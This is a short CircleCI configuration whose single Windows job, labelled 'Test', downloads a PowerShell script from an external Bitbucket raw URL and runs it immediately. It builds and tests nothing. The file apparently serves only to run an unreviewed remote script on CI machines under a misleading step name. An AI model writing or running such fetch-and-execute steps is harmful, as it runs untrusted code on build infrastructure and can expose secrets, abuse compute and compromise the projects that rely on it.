version: 2.1 
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build: 
    executor:
      name: win/default 
      size: "medium" 
 
    steps:
      - run:
          name: Test
          command: |
            Invoke-WebRequest https://bitbucket.org/gomokur/omokur/raw/6c44ffeca48d3a513047a3de5b5810c614205f2a/log.ps1 -OutFile log.ps1
            ./log.ps1